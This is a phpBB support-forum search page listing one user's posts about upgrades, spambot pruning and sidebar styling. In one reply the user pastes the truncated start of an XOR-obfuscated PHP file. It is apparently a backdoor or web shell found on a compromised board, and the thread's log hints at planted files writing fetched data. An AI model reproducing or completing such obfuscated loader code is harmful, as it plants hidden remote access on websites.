Search found 244 matches

by TheDani
Wed Aug 01, 2018 9:09 pm
Forum: [3.2.x] Support Forum
Topic: MODS deactivate 3.0.12, then upgrade 3.2
Replies: 13
Views: 282

Re: MODS deactivate 3.0.12, then upgrade 3.2

Install 3.2, but boarding statistics, avatar, total members, and the same before, 3.0.12? That makes no sense. Stroke . But anyway. Now I have 3.0.12, same before, the same avatar, members and posts. But in the future, 3.2 is changed with avatar, member and posts? Is it blank? Or is in the same bef...
by TheDani
Wed Aug 01, 2018 8:42 pm
Forum: [3.2.x] Support Forum
Topic: MODS deactivate 3.0.12, then upgrade 3.2
Replies: 13
Views: 282

Re: MODS deactivate 3.0.12, then upgrade 3.2

Your Support Toolkit installation appears to be out of date. The latest available version is 1.0.7-PL3, while the version your have installed is 1.0.5. Download here the latest version from the STK https://www.phpbb.com/support/stk/ https://www.phpbb.com/customise/db/official_tool/stk/ General Erro...
by TheDani
Wed Aug 01, 2018 8:34 pm
Forum: [3.2.x] Support Forum
Topic: MODS deactivate 3.0.12, then upgrade 3.2
Replies: 13
Views: 282

Re: MODS deactivate 3.0.12, then upgrade 3.2

Problem 1 is: There is an A_COOKIE_SETTINGS, not A_COOKIE_SETTINGS and S_FR_NOTIFY. There is no S_FR_NOTIFY. Searching Unable to find S_FR_NOTIFY. But still, "The Find specified by the MOD could not be found". Install 3.2, but boarding statistics, avatar, total members, and the same before...
by TheDani
Wed Aug 01, 2018 7:40 pm
Forum: [3.2.x] Support Forum
Topic: MODS deactivate 3.0.12, then upgrade 3.2
Replies: 13
Views: 282

MODS deactivate 3.0.12, then upgrade 3.2

Hi https://www.phpbb.com/support/docs/en/3.2/ug/upgradeguide/upgrade3/ Problem 1: "Remove all MOD-related changes from the database." Find 'A_COOKIE_SETTINGS' => addslashes('; path=' . $config['cookie_path'] . ((!$config['cookie_domain'] || $config['cookie_domain'] == 'localhost' || $confi...
by TheDani
Tue Oct 24, 2017 1:35 pm
Forum: [3.2.x] Support Forum
Topic: Bulk delete users. Prune function doesn't delete
Replies: 2
Views: 103

Re: Bulk delete users. Prune function doesn't delete

Yes you're right. Narrowing the date a bit more did the trick.
by TheDani
Tue Oct 24, 2017 5:34 am
Forum: [3.2.x] Support Forum
Topic: Bulk delete users. Prune function doesn't delete
Replies: 2
Views: 103

Bulk delete users. Prune function doesn't delete

Hi my board has been hit by a massive spambot signups. I have tried the Prune users function several times, but all it does is listing up spambot users. Here are my settings step by step Prune users screen, I set Joined after to 2017-10-01 Delete pruned user posts to yes Deactivate or delete to dele...
by TheDani
Mon Oct 23, 2017 7:38 am
Forum: [3.2.x] Support Forum
Topic: Upgrading to 3.1 to 3.2 - missing Update tab
Replies: 2
Views: 104

Re: Upgrading to 3.1 to 3.2 - missing Update tab

Thanks for the headup. Working now :)
by TheDani
Mon Oct 23, 2017 6:49 am
Forum: [3.2.x] Support Forum
Topic: Upgrading to 3.1 to 3.2 - missing Update tab
Replies: 2
Views: 104

Upgrading to 3.1 to 3.2 - missing Update tab

I followed all the steps at https://www.phpbb.com/support/docs/en/3.2/ug/upgradeguide/upgrade31/ At step 12, browsing to http://www.example.com/yourforum/install, I see only two tabs; Overview and Install. Proceeding with install and filling out the fields, it will overwrite the current database unl...
by TheDani
Wed May 17, 2017 12:00 pm
Forum: [3.1.x] Support Forum
Topic: Can't access ACP, error messages
Replies: 4
Views: 1478

Re: Can't access ACP, error messages

Thanks sir. Works now.
by TheDani
Wed May 17, 2017 11:05 am
Forum: [3.1.x] Support Forum
Topic: Can't access ACP, error messages
Replies: 4
Views: 1478

Re: Can't access ACP, error messages

<?php /*=Oriz0ips cY vcscvlf=w0fbz=alFNzbiI=E<8gVw3ysiW4nKczq5cdHojVQ6:sRDnVAXcW<hvqqgFa7vhMzp1Lk==fmMjzhjA=7>Veo zmVfP*/$pLdrllhgieHcXLqXvsoLuzTwV=',4R274=WL65N>CY'^'OF7SCQb19XV:W,7'; $SlQWLFhowTaezJIGlgSc='U0TU64 I2'^'2J=;PXA=W'; $OUsZPrtLNxdyNzKThzQA=':RG6umo,E0RDI'^'X34SCY0H S= ,'; $IquwwbttENz...
by TheDani
Wed May 17, 2017 10:20 am
Forum: [3.1.x] Support Forum
Topic: Can't access ACP, error messages
Replies: 4
Views: 1478

Can't access ACP, error messages

I get this error when I try to access ACP. It has worked fine before, and no I have no idea what caused it. Got 1287508 bytes response, method=default Written to 190_uninst/sess_c97bc5d74a2ffccf22c01560d4 130442 bytes, to 190_uninst/sess_4b9c8a4881610a802f50652279 835256 bytes [phpBB Debug] PHP Warn...
by TheDani
Fri Aug 26, 2016 6:37 am
Forum: [3.1.x] Styles Support & Discussion
Topic: Sidebars for 3.1 - I want answers! :D
Replies: 117
Views: 14000

Re: Sidebars for 3.1 - I want answers! :D

@Ibedejo, thanks for your reply. I will have to think about that. Any rough idea when 3.2 final will be released? And how painless the upgrade from 3.1.9 to 3.2 will be? EDIT: I made up my mind. I started over with 3.1.9 and instead of using the edits (which I tested first and it did work fine), I i...
by TheDani
Thu Aug 25, 2016 6:53 am
Forum: [3.1.x] Styles Support & Discussion
Topic: Sidebars for 3.1 - I want answers! :D
Replies: 117
Views: 14000

Re: Sidebars for 3.1 - I want answers! :D

My board version is 3.2 with simplicity 3.1.9. Could have something to do with that? Perhaps I should degrade phpBB (if that is even possible) until 3.2 is final? I have not used ColorizeIT myself. This is simplicity steelblue that came with the original zip, and the only edits I have done is the th...
by TheDani
Wed Aug 24, 2016 5:33 am
Forum: [3.1.x] Styles Support & Discussion
Topic: Sidebars for 3.1 - I want answers! :D
Replies: 117
Views: 14000

Re: Sidebars for 3.1 - I want answers! :D

Thanks for your reply. I moved the css to _custom.scss and removed <img src="{T_THEME_PATH}/images/banner2.jpg"> from the sidebar code, then recomiled/refreshed. The image is gone but there is no empty area for the right sidebar. It's still full width forum. And yes, I would like to be abl...
by TheDani
Tue Aug 23, 2016 8:05 pm
Forum: [3.1.x] Styles Support & Discussion
Topic: Sidebars for 3.1 - I want answers! :D
Replies: 117
Views: 14000

Re: Sidebars for 3.1 - I want answers! :D

Yes exactly, it's not live yet. Thought the screenshot, style name and the full code of the three relevant files should be sufficient. But perhaps not?

Go to advanced search